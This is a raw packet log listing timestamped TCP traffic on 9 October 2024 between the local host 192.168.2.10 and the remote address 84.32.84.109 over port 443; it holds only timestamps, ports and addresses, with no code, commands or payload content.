Oct 9, 2024 16:15:59.794663906 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.794670105 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.794688940 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.794692039 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.794713974 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.794811964 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.794851065 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.794867992 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.794872999 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.794922113 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.797380924 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.797458887 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.797463894 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.797524929 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.816329002 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.816468954 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.816492081 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.816579103 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.816590071 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.816613913 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.816688061 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.816688061 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.816714048 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.816871881 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.880743027 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.880825043 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.880835056 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.880846977 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.880892038 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.881038904 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.881155968 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.881172895 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.881179094 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.881221056 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.881278992 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.881366968 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.881366968 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.881372929 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.881659031 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.881705999 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.881706953 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.881724119 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.881836891 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.881908894 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.881942987 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.881963968 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.881968021 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.881975889 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.881994963 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.882117987 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.882172108 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.882173061 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.882179022 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.882194996 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.882286072 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.882292032 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.882606983 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.882900000 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.882955074 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.882976055 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.882981062 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.882989883 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.883016109 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.883029938 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.883029938 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.883038044 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.883090019 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.883090019 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.883177996 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.883229971 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.883239031 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.883248091 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.883328915 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.883335114 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.883409023 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.883505106 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.883558035 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.885507107 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.885555983 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.885574102 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.885579109 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.885607958 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.885828972 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.903775930 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.903825998 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.903868914 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.903888941 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.903888941 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.903894901 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.903904915 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.903925896 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.904097080 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.904103041 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.904345989 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.968343973 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.968436003 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.968472004 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.968661070 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.968696117 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.968703032 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.968740940 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.968760967 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.969284058 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.969516993 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.969549894 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.969556093 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.969696999 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.969723940 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.969803095 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.969820023 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.969847918 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.969892025 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.969959974 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.970040083 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.970073938 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.970079899 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.970150948 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.970170975 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.970264912 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.970323086 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.970323086 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.970336914 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.970372915 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.970455885 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.970462084 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.970470905 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.970519066 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.970529079 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.970552921 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.970623016 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.970629930 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.970660925 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.970740080 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.970740080 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.970747948 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.970752954 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.970814943 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.970820904 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.970870018 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.970900059 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.970905066 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.970971107 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.970992088 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.971067905 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.971072912 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.971098900 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.971127033 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.971133947 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.971187115 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.971219063 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.971328020 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.971414089 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.971414089 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.971420050 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.971458912 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.971538067 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.971543074 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.971554995 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.971623898 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.971627951 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.971664906 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.971746922 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.971752882 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.972740889 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.972978115 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.973058939 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.973144054 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.973213911 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.991858959 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.991993904 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.992007017 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.992034912 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.992065907 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.992125988 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.992160082 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.992167950 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.992229939 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.992257118 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.992438078 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:59.992444038 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:59.992495060 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.056997061 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.057080984 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.057090044 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.057106018 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.057116985 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.057152987 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.057152987 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.057152987 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.057163954 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.057220936 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.057226896 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.057240009 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.057271004 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.057276011 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.057293892 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.057476044 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.057549953 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.057555914 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.057586908 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.057653904 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.057660103 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.057684898 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.057796955 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.057831049 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.057838917 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.057902098 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.057903051 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.057955980 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.057960987 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.058007002 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.058067083 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.058068037 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.058073997 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.058125973 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.058173895 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.058180094 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.058238983 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.058279037 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.058284044 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.058342934 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.058357000 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.058442116 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.058446884 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.058456898 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.058511972 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.058516979 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.058528900 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.058548927 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.058594942 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.058600903 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.058660030 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.058708906 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.058715105 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.058733940 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.058756113 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.058828115 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.058831930 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.058850050 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.058991909 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.058996916 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.059163094 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.059292078 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.059323072 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.059323072 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.059329987 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.059382915 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.059416056 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.059416056 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.059436083 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.059572935 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.059581995 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.059642076 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.059644938 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.059741020 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.060666084 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.060738087 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.060750961 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.060919046 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.115128040 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.115273952 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.115406036 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.115406036 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.115417004 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.115648031 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.115783930 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.115888119 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.115894079 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.118149996 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.153033018 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.153196096 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.153235912 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.153247118 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.153261900 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.153284073 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.153294086 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.153388977 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.153390884 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.153422117 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.153470993 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.153470993 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.153731108 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.153806925 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.153824091 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.153908968 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.154061079 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.154148102 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.154165983 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.154407978 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.157582998 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.157684088 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.157689095 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.157711983 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.157768965 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.157768965 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.157859087 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.158051014 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.158060074 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.158155918 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.158190012 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.158195019 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.158504009 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.158504009 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.158659935 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.158761024 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.158778906 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.158847094 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.158874989 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.158946991 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.158973932 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.159044027 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.159085035 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.159174919 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.159190893 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.159271002 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.159285069 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.159375906 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.159413099 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.159420013 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.159569979 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.159569979 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.159967899 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.160062075 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.160119057 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.160124063 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.160167933 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.160167933 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.160187006 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.160317898 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.160326004 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.160345078 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.160373926 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.160379887 CEST	443	49723	84.32.84.109	192.168.2.10
